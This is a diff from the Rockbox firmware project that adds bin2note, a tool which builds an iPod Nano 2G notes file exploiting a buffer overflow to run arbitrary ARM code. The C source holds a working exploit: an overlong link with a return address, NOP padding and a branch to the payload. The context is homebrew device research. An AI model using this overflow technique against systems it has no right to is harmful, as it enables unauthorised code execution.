diff options
Diffstat (limited to 'utils/ipod/bin2note')
-rw-r--r-- | utils/ipod/bin2note/Makefile | 16 | ||||
-rw-r--r-- | utils/ipod/bin2note/README | 12 | ||||
-rw-r--r-- | utils/ipod/bin2note/bin2note.c | 180 |
3 files changed, 208 insertions, 0 deletions
diff --git a/utils/ipod/bin2note/Makefile b/utils/ipod/bin2note/Makefile new file mode 100644 index 0000000000..b5fd564d0a --- /dev/null +++ b/utils/ipod/bin2note/Makefile | |||
@@ -0,0 +1,16 @@ | |||
1 | # __________ __ ___. | ||
2 | # Open \______ \ ____ ____ | | _\_ |__ _______ ___ | ||
3 | # Source | _// _ \_/ ___\| |/ /| __ \ / _ \ \/ / | ||
4 | # Jukebox | | ( <_> ) \___| < | \_\ ( <_> > < < | ||
5 | # Firmware |____|_ /\____/ \___ >__|_ \|___ /\____/__/\_ \ | ||
6 | # \/ \/ \/ \/ \/ | ||
7 | # $Id$ | ||
8 | # | ||
9 | |||
10 | all: bin2note | ||
11 | |||
12 | bin2note: bin2note.c | ||
13 | gcc -W -Wall -o bin2note bin2note.c | ||
14 | |||
15 | clean: | ||
16 | rm -f bin2note | ||
diff --git a/utils/ipod/bin2note/README b/utils/ipod/bin2note/README new file mode 100644 index 0000000000..40f285ccd5 --- /dev/null +++ b/utils/ipod/bin2note/README | |||
@@ -0,0 +1,12 @@ | |||
1 | bin2note | ||
2 | -------- | ||
3 | |||
4 | bin2note implements the buffer overflow exploit documented here: | ||
5 | |||
6 | http://l4n.clustur.com/index.php/Nano2G_getting_exec | ||
7 | |||
8 | |||
9 | It is used to turn a blob of ARM code into an iPod notes file. This | ||
10 | ARM code will then be executed on the iPod. | ||
11 | |||
12 | It is known to work on the 2nd generation Nano. | ||
diff --git a/utils/ipod/bin2note/bin2note.c b/utils/ipod/bin2note/bin2note.c new file mode 100644 index 0000000000..5100039962 --- /dev/null +++ b/utils/ipod/bin2note/bin2note.c | |||
@@ -0,0 +1,180 @@ | |||
1 | /*************************************************************************** | ||
2 | * __________ __ ___. | ||
3 | * Open \______ \ ____ ____ | | _\_ |__ _______ ___ | ||
4 | * Source | _// _ \_/ ___\| |/ /| __ \ / _ \ \/ / | ||
5 | * Jukebox | | ( <_> ) \___| < | \_\ ( <_> > < < | ||
6 | * Firmware |____|_ /\____/ \___ >__|_ \|___ /\____/__/\_ \ | ||
7 | * \/ \/ \/ \/ \/ | ||
8 | * $Id$ | ||
9 | * | ||
10 | * bin2note - a program to insert binary code in an iPod Nano 2nd | ||
11 | * Generation notes file | ||
12 | * | ||
13 | * Based on research by stooo, TheSeven and others. | ||
14 | * | ||
15 | * Copyright (C) 2009 Dave Chapman | ||
16 | * | ||
17 | * This program is free software; you can redistribute it and/or | ||
18 | * modify it under the terms of the GNU General Public License | ||
19 | * as published by the Free Software Foundation; either version 2 | ||
20 | * of the License, or (at your option) any later version. | ||
21 | * | ||
22 | * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY | ||
23 | * KIND, either express or implied. | ||
24 | * | ||
25 | ****************************************************************************/ | ||
26 | |||
27 | #include <stdio.h> | ||
28 | #include <string.h> | ||
29 | #include <sys/types.h> | ||
30 | #include <sys/stat.h> | ||
31 | #include <fcntl.h> | ||
32 | #include <stdlib.h> | ||
33 | #include <unistd.h> | ||
34 | #include <stdint.h> | ||
35 | |||
36 | #ifndef O_BINARY | ||
37 | #define O_BINARY 0 | ||
38 | #endif | ||
39 | |||
40 | static off_t filesize(int fd) | ||
41 | { | ||
42 | struct stat buf; | ||
43 | |||
44 | fstat(fd,&buf); | ||
45 | return buf.st_size; | ||
46 | } | ||
47 | |||
48 | void write_utf16le(unsigned char* buf, int len, FILE* fp) | ||
49 | { | ||
50 | int i; | ||
51 | char tmp[2]; | ||
52 | |||
53 | tmp[1] = 0; | ||
54 | |||
55 | for (i=0;i<len;i++) { | ||
56 | tmp[0] = buf[i]; | ||
57 | fwrite(tmp, 1, sizeof(tmp), fp); | ||
58 | } | ||
59 | } | ||
60 | |||
61 | void insert_link(unsigned char* buf, uint32_t pointer) | ||
62 | { | ||
63 | char link[] = "<a href=\"AAAAAAA" | ||
64 | "AAAAAAAAAAAAAAAA" | ||
65 | "AAAAAAAAAAAAAAAA" | ||
66 | "AAAAAAAAAAAAAAAA" | ||
67 | "AAAAAAAAAAAAAAAA" | ||
68 | "AAAAAAAAAAAAAAAA" | ||
69 | "AAAAAAAAAAAAAAAA" | ||
70 | "AAAAAAAAAAAAAAAA" | ||
71 | "AAAAAAAAAAAAAAAA" | ||
72 | "AAAAAAAAAAAAAAAA" | ||
73 | "AAAAAAAAAAAAAAAA" | ||
74 | "AAAAAAAAAAAAAAAA" | ||
75 | "AAAAAAAAAAAAAAAA" | ||
76 | "AAAAAAAAAAAAAAAA" | ||
77 | "AAAAAAAAAAAAAAAA" | ||
78 | "AAAAAAAAAAAAAAAA" | ||
79 | "AAAAAAAAAAAAAAAA" | ||
80 | "AAAAAAAAAAAAA%xx" | ||
81 | "%xx%xx%xx\"></a>"; | ||
82 | char tmp[32]; | ||
83 | unsigned int i; | ||
84 | |||
85 | sprintf(tmp, "%%%02x%%%02x%%%02x%%%02x", | ||
86 | pointer & 0xff, | ||
87 | (pointer >> 8) & 0xff, | ||
88 | (pointer >> 16) & 0xff, | ||
89 | (pointer >> 24) & 0xff); | ||
90 | |||
91 | memcpy(link + 0x11d, tmp, 12); | ||
92 | |||
93 | /* UTF-16 little-endian BOM */ | ||
94 | buf[0] = 0xff; | ||
95 | buf[1] = 0xfe; | ||
96 | |||
97 | /* UTF-16 little-endian URL */ | ||
98 | for (i=0;i<strlen(link);i++) { | ||
99 | buf[i*2+2] = link[i]; | ||
100 | buf[i*2+3] = 0; | ||
101 | } | ||
102 | } | ||
103 | |||
104 | #define MAX_NOTES_SIZE 4096 | ||
105 | #define MAX_PAYLOAD_SIZE (MAX_NOTES_SIZE - 0x260 - 4) | ||
106 | |||
107 | int main (int argc, char* argv[]) | ||
108 | { | ||
109 | char* infile; | ||
110 | char* htmname; | ||
111 | int fdin,fdout; | ||
112 | unsigned char buf[MAX_NOTES_SIZE]; | ||
113 | int len; | ||
114 | int n; | ||
115 | int i; | ||
116 | |||
117 | if (argc != 3) { | ||
118 | fprintf(stderr,"Usage: bin2note file.bin file.htm\n"); | ||
119 | return 1; | ||
120 | } | ||
121 | |||
122 | infile=argv[1]; | ||
123 | htmname=argv[2]; | ||
124 | |||
125 | fdin = open(infile,O_RDONLY|O_BINARY); | ||
126 | if (fdin < 0) { | ||
127 | fprintf(stderr,"Can not open %s\n",infile); | ||
128 | return 1; | ||
129 | } | ||
130 | |||
131 | len = filesize(fdin); | ||
132 | |||
133 | if (len > MAX_PAYLOAD_SIZE) { | ||
134 | fprintf(stderr,"Payload too big!\n"); | ||
135 | close(fdin); | ||
136 | return 1; | ||
137 | } | ||
138 | |||
139 | /* **** Input file is OK, now build the note **** */ | ||
140 | |||
141 | /* Insert URL at start of note */ | ||
142 | insert_link(buf, 0x08640568); | ||
143 | |||
144 | /* Load code at offset 0x260 */ | ||
145 | n = read(fdin,buf + 0x260,len); | ||
146 | if (n < len) { | ||
147 | fprintf(stderr,"Short read, aborting\n"); | ||
148 | return 1; | ||
149 | } | ||
150 | close(fdin); | ||
151 | |||
152 | /* Fill the remaining buffer with NOPs (mov r1,r1) - 0xe1a01001 */ | ||
153 | for (i=0x260 + len; i < MAX_NOTES_SIZE-4; i+=4) { | ||
154 | buf[i] = 0x01; | ||
155 | buf[i+1] = 0x10; | ||
156 | buf[i+2] = 0xa0; | ||
157 | buf[i+3] = 0xe1; | ||
158 | } | ||
159 | |||
160 | /* Finally append a branch back to our code - 0x260 in the note */ | ||
161 | buf[MAX_NOTES_SIZE-4] = 0x97; | ||
162 | buf[MAX_NOTES_SIZE-3] = 0xfc; | ||
163 | buf[MAX_NOTES_SIZE-2] = 0xff; | ||
164 | buf[MAX_NOTES_SIZE-1] = 0xea; | ||
165 | |||
166 | fdout = open(htmname, O_CREAT|O_TRUNC|O_BINARY|O_WRONLY, 0666); | ||
167 | if (fdout < 0) { | ||
168 | fprintf(stderr,"Could not open output file\n"); | ||
169 | return 1; | ||
170 | } | ||
171 | |||
172 | if (write(fdout, buf, sizeof(buf)) != sizeof(buf)) { | ||
173 | fprintf(stderr,"Error writing output file\n"); | ||
174 | close(fdout); | ||
175 | return 1; | ||
176 | } | ||
177 | |||
178 | close(fdout); | ||
179 | return 0; | ||
180 | } | ||